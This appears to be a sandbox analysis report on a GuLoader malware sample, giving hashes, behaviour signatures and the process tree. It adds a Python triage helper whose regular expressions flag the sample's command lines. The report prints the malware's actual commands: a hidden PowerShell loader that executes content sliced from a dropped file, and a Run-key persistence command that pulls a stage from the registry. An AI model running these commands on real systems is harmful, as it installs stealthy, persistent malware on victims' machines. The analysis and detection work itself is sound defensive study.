Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-07-2024 10:02

General

  • Target

    MalwareBazaar.exe

  • Size

    401KB

  • MD5

    f1043033237fa935ef9af72415e657a1

  • SHA1

    b1ce2973b99811fe469ae6b4c450e97d4d4f4a20

  • SHA256

    a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7

  • SHA512

    1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b

  • SSDEEP

    6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl

Malware Config

Signatures

  • GuLoader, CloudEyE

    A shellcode-based downloader first seen in 2020.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
    "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:820
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2304
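The process tree above carries the three observable pieces of this GuLoader chain: a hidden PowerShell that reads delysten.imp, slices three characters out of it at offset 71093 and dot-invokes that token on the whole file content (the report does not show what the token is; presumably the name of a cmdlet or alias), a PowerShell child of a Windows Mail binary (wab.exe) that then drives cmd.exe and reg.exe, and a Run value of type REG_EXPAND_SZ whose command begins with %pantstnings% (the report does not show that variable being set; it is assumed to expand to a PowerShell path) and pulls its next stage from the registry value HKCU\Chet\Ruelike rather than from a file. The Python below is an added triage helper, not part of this report or of the sandbox vendor's tooling. It runs over constructed process records copied from the tree above (the root's parent PID is assumed), tags each command line for those behaviours with regular expressions, and lists the parent/child pairs that are out of place; the tag names and the unusual-child table are this example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class Proc:
    """One process record: PID, parent PID, image path and command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Persistence command exactly as it appears in the tree above (cmd.exe and reg.exe).
REG_ADD_CMD = (
    r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" '
    r'/t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized '
    r"$Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;"
    r'%pantstnings% ($Uselessness)"'
)

# Constructed records mirroring the sandbox process tree in this report.
# The root's parent PID (0) is an assumption; the report does not show it.
PROCS = [
    Proc(2932, 0, r"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"'),
    Proc(2816, 2932, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content '
         r"'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';"
         r'$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"'),
    Proc(588, 2816, r"C:\Program Files (x86)\windows mail\wab.exe",
         r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    Proc(820, 588, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD_CMD),
    Proc(2304, 820, r"C:\Windows\SysWOW64\reg.exe", REG_ADD_CMD),
]

# PowerShell started with its window hidden or minimized (both forms occur above).
WINDOW_RE = re.compile(r"-windowstyle\s+(?:hidden|minimized)", re.I)
# Read a file, slice a short token out of it, then dot-invoke the token on the content.
SUBSTRING_INVOKE_RE = re.compile(
    r"Get-Content\b.*?\.SubString\(\s*\d+\s*,\s*\d+\s*\).*?(?<![\w$])\.\$\w+\s*\(",
    re.I | re.S)
# REG ADD into a Run key; the expandable command string starts with an env var.
RUN_KEY_RE = re.compile(
    r"REG\s+ADD\s+HK(?:CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)
ENV_CMD_RE = re.compile(r"/t\s+REG_EXPAND_SZ\s+/d\s+\"%(\w+)%", re.I)
# Next stage read from a registry value instead of a file on disk.
REG_PAYLOAD_RE = re.compile(
    r"Get-ItemProperty\s+-Path\s+'(HK\w+:\\[^']*)'\s*\)\s*\.(\w+)", re.I)


def analyze_cmdline(cmd: str) -> list[str]:
    """Return tags describing what is suspicious about one command line."""
    tags = []
    if WINDOW_RE.search(cmd):
        tags.append("window-hidden-or-minimized")
    if SUBSTRING_INVOKE_RE.search(cmd):
        tags.append("file-substring-dot-invoke")
    if RUN_KEY_RE.search(cmd):
        tags.append("run-key-persistence")
        m = ENV_CMD_RE.search(cmd)
        if m:
            tags.append(f"run-command-via-env:{m.group(1)}")
    m = REG_PAYLOAD_RE.search(cmd)
    if m:
        tags.append(f"registry-resident-payload:{m.group(1)}{m.group(2)}")
    return tags


# Parent -> child pairs that are out of place for these images (example's own table):
# PowerShell spawning a mail-client binary, and that binary then driving cmd/powershell.
UNUSUAL_CHILDREN = {
    "powershell.exe": {"wab.exe"},
    "wab.exe": {"cmd.exe", "powershell.exe"},
}


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def unusual_parent_child(procs: list[Proc]) -> list[tuple[str, str]]:
    """(parent, child) image-name pairs listed in UNUSUAL_CHILDREN, in tree order."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        pname, cname = image_name(parent.image), image_name(p.image)
        if cname in UNUSUAL_CHILDREN.get(pname, set()):
            hits.append((pname, cname))
    return hits


def triage(procs: list[Proc]) -> dict[int, list[str]]:
    """PID -> tags, only for processes with at least one finding."""
    return {p.pid: t for p in procs if (t := analyze_cmdline(p.cmdline))}


if __name__ == "__main__":
    for pid, tags in triage(PROCS).items():
        print(pid, tags)
    print(unusual_parent_child(PROCS))
```

On a real host the records would come from Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled) rather than from a pasted tree; the parent/child table is deliberately small and should be extended from your own baseline rather than copied as-is. The registry-resident-payload tag is the one worth following up immediately, since the staged content under HKCU\Chet survives deletion of the dropped files.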

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und

    Filesize

    350KB

    MD5

    be381f7baf52513e52dfed9361a6dc69

    SHA1

    a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a

    SHA256

    caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79

    SHA512

    c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a

  • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

    Filesize

    69KB

    MD5

    8172795f7c8cfb7cc597e879d2b0b468

    SHA1

    811797a9309a1bc3429f3bc7735eb6af1a7c80dc

    SHA256

    5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c

    SHA512

    9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

  • memory/588-46-0x0000000001670000-0x0000000003EAF000-memory.dmp

    Filesize

    40.2MB

  • memory/588-23-0x0000000000600000-0x0000000001662000-memory.dmp

    Filesize

    16.4MB

  • memory/2816-18-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-15-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-11-0x0000000074081000-0x0000000074082000-memory.dmp

    Filesize

    4KB

  • memory/2816-14-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-20-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-21-0x00000000067C0000-0x0000000008FFF000-memory.dmp

    Filesize

    40.2MB

  • memory/2816-22-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-13-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-12-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB